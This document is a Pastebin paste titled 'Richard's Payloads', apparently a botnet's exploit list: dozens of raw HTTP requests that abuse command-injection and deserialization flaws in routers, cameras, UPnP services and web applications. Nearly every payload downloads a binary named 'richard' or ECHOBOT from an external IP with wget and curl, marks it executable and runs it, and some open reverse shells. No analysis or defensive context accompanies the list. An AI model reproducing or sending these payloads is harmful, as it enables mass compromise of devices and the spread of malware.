Advertisement
Guest User

Richard's Payloads

a guest
Aug 6th, 2019
6,650
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 22.87 KB | None | 0 0
  1. Different payloads:
  2.  
  3. POST /portal/apis/aggrecate_js.cgi?script=launcher%22%26python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard))%3Bos.dup2(s.fileno()%2C0)%3B%20os.dup2(s.fileno()%2C1)%3B%20os.dup2(s.fileno()%2C2)%3Bp%3Dsubprocess.call(%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D)%3B%27%22 HTTP/1.1
  4. Content-Length: 630
  5. Accept-Encoding: gzip, deflate
  6. Accept: /
  7. User-Agent: Hello-World
  8. Connection: keep-alive
  9.  
  10.  
  11. POST /stainfo.cgi?ifname=eth0;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1
  12.  
  13.  
  14. GET /cgi-bin/masterCGI?ping=nomip&user=;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1
  15.  
  16.  
  17. GET /cgi-bin/script?cd /tmp;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1
  18.  
  19.  
  20. GET /Main_Analysis_Content.asp?current_page=Main_Analysis_Content.asp&next_page=Main_Analysis_Content.asp&next_host=www.target.com&group_id=&modified=0&action_mode=+Refresh+&action_script=&action_wait=&first_time=&applyFlag=1&preferred_lang=EN&firmver=1.1.2.3_345-g987b580&cmdMethod=ping&destIP=%60uwget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard%60&pingCNT=5 HTTP/1.1
  21. Host: 192.168.0.1:80
  22. Connection: keep-alive
  23. Pragma: no-cache
  24. Cache-Control: no-cache
  25. Upgrade-Insecure-Requests: 1
  26. Connection: keep-alive
  27. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
  28. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
  29. Referer: http://www.target.com/Main_Analysis_Content.asp
  30. Accept-Encoding: gzip, deflate
  31. Accept-Language: en-US,en;q=0.9
  32.  
  33.  
  34. GET /apply.cgi?current_page=Main_Analysis_Content.asp&next_page=Main_Analysis_Content.asp&next_host=192.168.1.1&group_id=&modified=0&action_mode=+Refresh+&action_script=&action_wait=&first_time=&preferred_lang=EN&SystemCmd=ping+-c+5+%3B+ls+-l&firmver=3.0.0.4&cmdMethod=ping&destIP=wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard&pingCNT=5 HTTP/1.1
  35. Host: 192.168.1.1:80
  36. Proxy-Connection: keep-alive
  37. Authorization: Basic ZGVmYXVsdA==
  38. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  39. User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.94 Safari/537.36
  40. Referer: http://192.168.1.1/Main_Analysis_Content.asp
  41. Accept-Encoding: gzip,deflate,sdch
  42. Accept-Language: en-US,en;q=0.8
  43.  
  44.  
  45. GET /awstatstotals/awstatstotals.php?sort=].passthru('echo%20YYY;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard;echo%20YYY;').exit().%24a[ HTTP/1.1
  46. sort=].phpinfo().exit().$a[
  47. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
  48. Connection: Close
  49.  
  50.  
  51. GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard;echo%20YYY;echo| HTTP/1.1
  52. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
  53. Connection: Close
  54.  
  55.  
  56. GET /cgi-bin/awstats.pl?migrate=|echo;echo%20YYY;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard;echo%20YYY;echo|awstats HTTP/1.1
  57. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
  58. Connection: Close
  59.  
  60.  
  61. GET /cgi-bin/img.pl HTTP/1.1
  62. f=etc/hosts
  63. f=%Q!bin/sh -c echo 'YYY';wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard; echo 'YYY'|!
  64.  
  65.  
  66. POST /upnpisapi?uuid:+urn:beckhoff.com:serviceId:cxconfig HTTP/1.1
  67. User-Agent: Hello-World
  68. Host: 192.168.0.1:5120
  69. Content-type: text/xml; charset=utf-8
  70. SOAPAction: urn:beckhoff.com:service:cxconfig:1#Write
  71. M-SEARCH * HTTP/1.1
  72. HOST: 239.255.255.250:1900
  73. MAN: ssdp:discover
  74. MX: 3
  75. ST: upnp:rootdevice
  76. <?xml version="1.0" encoding="utf-8"?><s:Envelope s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><u:Write xmlns:u="urn:beckhoff.com:service:cxconfig:1"><netId></netId><nPort>0</nPort><indexGroup>0</indexGroup><IndexOffset>wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard</IndexOffset><pData>AQAAAAAA</pData></u:Write></s:Body></s:Envelope>
  77.  
  78.  
  79. POST /upnp/control/basicevent1 HTTP/1.1
  80. Host: %s:49152
  81. Connection: keep-alive
  82. Accept-Encoding: gzip, deflate Accept: */*
  83. User-Agent: python-requests/2.18.4
  84. SOAPAction: urn:Belkin:service:basicevent:1#SetSmartDevInfo
  85. Content-Length: 393
  86. <?xml version="1.0" encoding="utf-8"?> <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <s:Body><u:SetSmartDevInfo xmlns:u="urn:Belkin:service:basicevent:1"> <SmartDevURL>wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard -O /tmp/ECHOBOT; chmod +x /tmp/ECHOBOT; /tmp/ECHOBOT</SmartDevURL> </u:SetSmartDevInfo> </s:Body> </s:Envelope>
  87.  
  88.  
  89. GET /cgi-bin/operator/servetest?cmd=cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1
  90. Authorization: Basic YWRtaW46YWRtaW4=
  91. Server: Boa/0.94.14rc21
  92. Accept-Ranges: bytes
  93. Connection: close
  94. Content-type: text/plain
  95.  
  96.  
  97. POST /cgi-bin/file_transfer.cgi HTTP/1.1
  98. Content-Type: application/x-www-form-urlencoded
  99. file_transfer=new&dir='Pa_Notewget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richardPa_Note
  100.  
  101.  
  102. POST /sdwan/nitro/v1/config/get_package_file?action=file_download/cgi-bin/installpatch.cgi?swc-token=%d&installfile=`%s`' % 99999 cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1
  103. 'SSL_CLIENT_VERIFY' : 'SUCCESS'
  104. get_package_fil:
  105. site_name: 'blah' union select 'tenable','zero','day','research' INTO OUTFILE '/tmp/token_0';#,appliance_type: primary,package_type: active
  106. User-Agent: Hello-World
  107. Connection: keep-alive
  108. <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
  109.  
  110.  
  111. POST /web/cgi-bin/usbinteract.cgi HTTP/1.1
  112. Host: 192.168.0.1:9000
  113. Content-Length: 155
  114. Content-Type: application/x-www-form-urlencoded
  115. action=7&path="|cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard||
  116.  
  117.  
  118. POST /dogfood/mail/spell.php HTTP/1.1
  119. data=wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard
  120.  
  121.  
  122. POST /apps/a3/cfg_ethping.cgi HTTP/1.1
  123. MYLINK=%2Fapps%2Fa3%2Fcfg_ethping.cgi&CMD=u&PINGADDRESS=;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard+%26
  124.  
  125.  
  126. POST /cgi-bin/;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard -O /tmp/ECHOBOT; chmod +x /tmp/ECHOBOT; /tmp/ECHOBOT HTTP/1.1
  127.  
  128.  
  129. POST /service/krashrpt.php HTTP/1.1
  130. Host: 192.168.0.1:80
  131. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0
  132. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  133. Accept: /
  134. User-Agent: Hello-World
  135. Accept-Language: en-US,en;q=0.5
  136. Accept-Encoding: gzip, deflate
  137. Cookie: kboxid=r8cnb8r3otq27vd14j7e0ahj24
  138. Connection: close
  139. Upgrade-Insecure-Requests: 1
  140. Content-Type: application/x-www-form-urlencoded
  141. Content-Length: 37
  142. kuid=id | wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard
  143.  
  144.  
  145. POST /soap.cgi?service=WANIPConn1 HTTP/1.1
  146. Content-Length: 649
  147. Host: 10.8.28.133:49152
  148. Content-Type: text/xml
  149. SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
  150. <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"><NewPortMappingDescription></NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping></SOAP-ENV:Body></SOAP-ENV:Envelope>
  151.  
  152.  
  153. POST /webadmin/script?command=|wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1
  154. Content-Length: 630
  155. Accept-Encoding: gzip, deflate
  156. Accept: /
  157. User-Agent: Hello-World
  158. Connection: keep-alive
  159.  
  160.  
  161. GET /recordings/misc/callme_page.php?action=c&callmenum=@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard%0D%0A%0D%0A HTTP/1.1
  162.  
  163.  
  164. GET /cgi-bin/webcm HTTP/1.1
  165. var:lang&cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard
  166.  
  167.  
  168. POST /uapi-cgi/viewer/admin/testaction.cgi?&type=ip&ip=eth0%20wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard|ping%20-c%203%201.1.1.1|x HTTP/1.1
  169. Content-Length: 630
  170. Accept-Encoding: gzip, deflate
  171. Accept: /
  172. User-Agent: Hello-World
  173. Connection: keep-alive
  174.  
  175.  
  176. GET /api/project/repo/log/graph/%60wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard%60 HTTP/1.1
  177.  
  178.  
  179. POST /api/backup/logout.cgi?sid=aa HTTP/1.1
  180. Content-type: text/html
  181. wget+http://185.164.72.155/richard+-O+/tmp/ECHOBOT; chmod +x /tmp/ECHOBOT; /bin/tclsh+/tmp/ECHOBOT
  182.  
  183.  
  184. POST /protocol.csp?function=set&fname=security&opt=mac_table&flag=close_forever&mac=|wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1
  185. Content-Length: 630
  186. Accept-Encoding: gzip, deflate
  187. Accept: /
  188. User-Agent: Hello-World
  189. Connection: keep-alive
  190.  
  191.  
  192. POST /html/SetSmarcardSettings.php HTTP/1.1
  193. Content-Length: 11660
  194. Content-Type: application/x-www-form-urlencoded
  195. Connection: close
  196. X-Powered-By: PHP/5.5.13
  197. User-Agent: joxypoxy/7.2.6
  198. HidChannelID=2&HidcmbBook=0&cmbBook=0|cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard+%23&HidDisOffSet=13&txtOffSet=37&HidDataFormat=1&HidDataFormatVal=1&DataFormat=1&HidFileAvailable=0&HidEncryAlg=0&EncryAlg=0&HidFileType=0&HidIsFileSelect=0&HidUseAsProxCard=0&HidVerForPHP=1.00.08
  199.  
  200.  
  201. GET /setup.cgi?ping_ipaddr1=1&ping_ipaddr2=1&ping_ipaddr3=1&ping_ipaddr4=1&ping_size=60&ping_number=1&ping_interval=1000&ping_timeout=5000&start=Start+Test&todo=ping_test&this_file=Diagnostics.htm&next_file=Diagnostics.htm&c4_ping_ipaddr=1.1.1.1;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard aux&message= HTTP/1.1
  202. Host: 192.168.1.1:80
  203. Authorization: Basic YWRtaW46YWRtaW4=
  204.  
  205.  
  206. GET /awcuser/cgi-bin/vcs HTTP/1.1
  207. xml=withXsl
  208. xsl=wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard
  209.  
  210.  
  211. GET /nagios/cgi-bin/statuswml.cgi?ping=wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard%3Becho+%24PATH HTTP/1.1
  212.  
  213.  
  214. GET /upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard%205;%27 HTTP/1.1
  215.  
  216.  
  217. GET /upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard;%27 HTTP/1.1
  218. Host: 192.168.0.1:50000
  219. Connection: keep-alive
  220. Cache-Control: max-age=0
  221. Upgrade-Insecure-Requests: 1
  222. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
  223. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
  224. Accept-Encoding: gzip, deflate
  225. Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
  226. Cookie: PHPSESSID=7b74657ab949a442c9e440ccf050de1e; lang=en
  227.  
  228.  
  229. GET /scripts/rpc.php?action=updatetime&timeserver=||cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1
  230.  
  231.  
  232. POST /op5config/welcome HTTP/1.1
  233. Connection: Close
  234. do=do=Login&password=wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard
  235.  
  236.  
  237. GET /monitor/op5/nacoma/command_test.php?cmd_str=wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1
  238.  
  239.  
  240. GET /OvCgi/connectedNodes.ovpl HTTP/1.1
  241. %Q!; echo YYY;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard; echo YYY| tr
  242.  
  243.  
  244. POST /_async/AsyncResponseServiceHttps HTTP/1.1
  245. Accept-Encoding: gzip, deflate
  246. Accept: */*
  247. Accept-Language: en
  248. User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
  249. User-Agent: Hello-World
  250. Connection: close
  251. Content-Type: text/xml
  252. <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService" <soapenv:Header>
  253. <wsa:Action>xx</wsa:Action>
  254. <wsa:RelatesTo>xx</wsa:RelatesTo>
  255. </work:WorkContext> xmlns:work="http://bea.com/2004/06/soap/workarea/"> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"><void index="0"><string>cmd</string></void><void index="1"><string>wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard</string></void></array><void method="start"/></void></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>
  256.  
  257.  
  258. POST /moadmin/moadmin.php HTTP/1.1
  259. Host: 192.168.0.1:80
  260. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0)Gecko/20100101 Firefox/36.0
  261. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  262. Accept-Language: en-US,en;q=0.5
  263. Accept-Encoding: gzip, deflate
  264. DNT: 1
  265. Connection: keep-alive
  266. Pragma: no-cache
  267. Cache-Control: no-cache
  268. Content-Type: application/x-www-form-urlencoded
  269. Content-Length: 34
  270. object=1;system(wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard);exit
  271.  
  272.  
  273. GET /p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2?cmd=wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1
  274.  
  275.  
  276. POST /parse_xml.cgi HTTP/1.1
  277. Content-Length:
  278. Content-Type: application/x-www-form-urlencoded
  279. filename=;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard
  280.  
  281.  
  282. POST /users/%2f/%2fproc%2fself%2fcomm HTTP/1.1
  283. Content-Type: multipart/form-data; boundary=
  284. <%=`wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard -O /tmp/richard; chmod +x /tmp/richard; /tmp/richard`%>
  285.  
  286.  
  287. POST /wanipcn.xml HTTP/1.1
  288. Content-Length: 630
  289. Accept-Encoding: gzip, deflate
  290. SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
  291. Accept: /
  292. User-Agent: Hello-World
  293. Connection: keep-alive
  294. <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
  295.  
  296.  
  297. GET /repository/annotate?rev=wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1
  298. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
  299. Connection: Close
  300.  
  301.  
  302. POST /SGPAdmin/fileRequest HTTP/1.1
  303. &invoker=&title=&params=&id=&cmd=cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard&source=&query=
  304.  
  305.  
  306. GET /goform/formSysCmd HTTP/1.1
  307. ('<textarea rows="15" name="msg" cols="80" wrap="virtual">')
  308. ('</textarea>')
  309. {'sysCmd': cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard, 'apply': 'Apply', 'submit-url':'/syscmd.asp', 'msg':''}
  310.  
  311. POST cgi-bin/diagnostic.cgi?select_mode_ping=on&ping_ipaddr=-q -s 0 127.0.0.1;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard;&ping_count=1&action=Apply&html_view=ping HTTP/1.1
  312.  
  313.  
  314. GET /?search[send][]=eval&search[send][]=Kernel.fork%20do%60wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard%60end HTTP/1.1
  315. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
  316. Connection: Close
  317.  
  318.  
  319. GET /qsrserver/device/getThumbnail?sourceUri=
  320. +-;rm+/tmp/f;mkfifo+/tmp/f;cat+/tmp/f+|+/bin/sh+-i+2>&1+|+;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard -O /tmp/f; chmod 777 /tmp/f; /tmp/f; >/tmp/f ;&targetUri=/tmp/thumb/test.jpg&mediaType=image&targetWidth=400&targetHeight=400&scaleType=crop&=1537275717150 HTTP/1.1
  321. Content-Length: 630
  322. Accept-Encoding: gzip, deflate
  323. User-Agent: Hello-World
  324. Host: 192.168.0.1:9080
  325. Connection: keep-alive
  326.  
  327.  
  328. POST /page/maintenance/lanSettings/dns HTTP/1.1
  329. Host: 192.168.0.1:80
  330. Content-Length: 64
  331. Accept: */*
  332. Origin: http://192.168.0.1
  333. X-Requested-With: XMLHttpRequest
  334. User-Agent: Testingus/1.0
  335. Content-Type: application/x-www-form-urlencoded
  336. Referer: http://192.168.0.1/maintenance
  337. Accept-Language: en-US,en;q=0.8,mk;q=0.6
  338. Cookie: PHPSESSID=d1eabfdb8db4b95f92c12b8402abc03b
  339. Connection: close
  340. dns%5Bserver1%5D=8.8.8.8&dns%5Bserver2%5D=8.8.4.4%60cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard%60
  341.  
  342.  
  343. POST /smartdomuspad/modules/reporting/track_import_export.php HTTP/1.1
  344. Host: 192.168.0.1
  345. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
  346. Accept: /
  347. Accept-Language: en-US,en;q=0.5
  348. Accept-Encoding: gzip, deflate
  349. Connection: close
  350. Cookie: PHPSESSID=l337qjbsjk4js9ipm6mppa5qn4
  351. Content-Type: application/x-www-form-urlencoded
  352. Content-Length: 86
  353. op=export&language=english&interval=1&object_id=wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard
  354.  
  355.  
  356. POST /upnp/control/hag HTTP/1.1
  357. Host: %s:49451
  358. Accept: text/javascript, text/html, application/xml, text/xml, */*
  359. Accept-Language: en-us,en;q=0.5
  360. Accept-Encoding: gzip, deflate
  361. X-Requested-With: XMLHttpRequest
  362. X-Prototype-Version: 1.7
  363. Content-Type: text/xml;charset=UTF-8
  364. MIME-Version: 1.0
  365. Content-Length: 311
  366. Connection: keep-alive
  367. Pragma: no-cache
  368. SOAPAction: urn:schemas-micasaverde-org:service:HomeAutomationGateway:1#RunLua
  369. <s:Envelope s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body> <u:RunLua xmlns:u="urn:schemas-micasaverde-org:service:HomeAutomationGateway:1"> <DeviceNum></DeviceNum> <Code>os.execute(wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard)</Code> </u:RunLua></s:Body></s:Envelope>
  370.  
  371.  
  372. POST /scripts/ajaxPortal.lua HTTP/1.1
  373. User-Agent: Mozilla/5.0 (X11; Linux i686; rv:52.0) Gecko/20100101 Firefox/52.0
  374. Accept: application/json, text/javascript, */*; q=0.01
  375. Accept-Language: en-US,en;q=0.5
  376. Accept-Encoding: gzip, deflate
  377. Referer: https://www.vmware.com
  378. Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  379. X-Requested-With: XMLHttpRequest
  380. Cookie: culture=en-us
  381. Connection: close
  382. destination=8.8.8.8$(wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard)&test=DNS_TEST&requestTimeout=90&auth_token=&_cmd=run_diagnostic
  383. destination=8.8.8.8$(wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard)&source=192.168.0.1&test=BASIC_PING&requestTimeout=90&auth_token=&_cmd=run_diagnostic
  384.  
  385.  
  386. POST /cgi-bin/rdfs.cgi HTTP/1.1
  387. Host: 192.168.0.1:80
  388. application/x-www-form-urlencoded
  389. Content-Length: 1024
  390. Client=;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard;&Download=submit
  391.  
  392.  
  393. GET /system.ini?loginuse&loginpas HTTP/1.1
  394.  
  395.  
  396. GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(wget+http://185.164.72.155/richard; chmod+777+/tmp/richard; /tmp/richard+goahead)&dir=/&mode=PORT&upload_interval=0
  397.  
  398.  
  399. GET /ftptest.cgi?next_url=test_ftp.htm&loginuse=%s&loginpas=%s
  400.  
  401.  
  402. GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=passpasspasspasspasspasspasspasspass&dir=/&mode=PORT&upload_interval=0
  403.  
  404.  
  405. POST /actionHandler/ajax_network_diagnostic_tools.php HTTP/1.1
  406. Host: 10.0.0.1:80
  407. User-Agent:
  408. Accept: application/json, text/javascript, */*; q=0.01
  409. Accept-Language: en-US,en;q=0.5
  410. Accept-Encoding: gzip, deflate
  411. Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  412. X-Requested-With: XMLHttpRequest
  413. Referer: http://10.0.0.1/network_diagnostic_tools.php
  414. Content-Length: 91
  415. Cookie: PHPSESSID=; auth=
  416. DNT: 1
  417. X-Forwarded-For: 8.8.8.8
  418. Connection: keep-alive
  419. test_connectivity=true&destination_address=www.comcast.net || cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard; &count1=4
  420.  
  421.  
  422. POST /cgi-bin/cgiServer.exx HTTP/1.1
  423. Host: 10.0.75.122:80
  424. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  425. Accept-Language: en-US,en;q=0.5
  426. Accept-Encoding: gzip, deflate
  427. Authorization: Basic YWRtaW46YWRtaW4=
  428. Connection: keep-alive
  429. Content-Type: application/x-www-form-urlencoded
  430. Content-Length: 0
  431. system(wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard)
  432.  
  433.  
  434. GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard;%22 HTTP/1.1
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement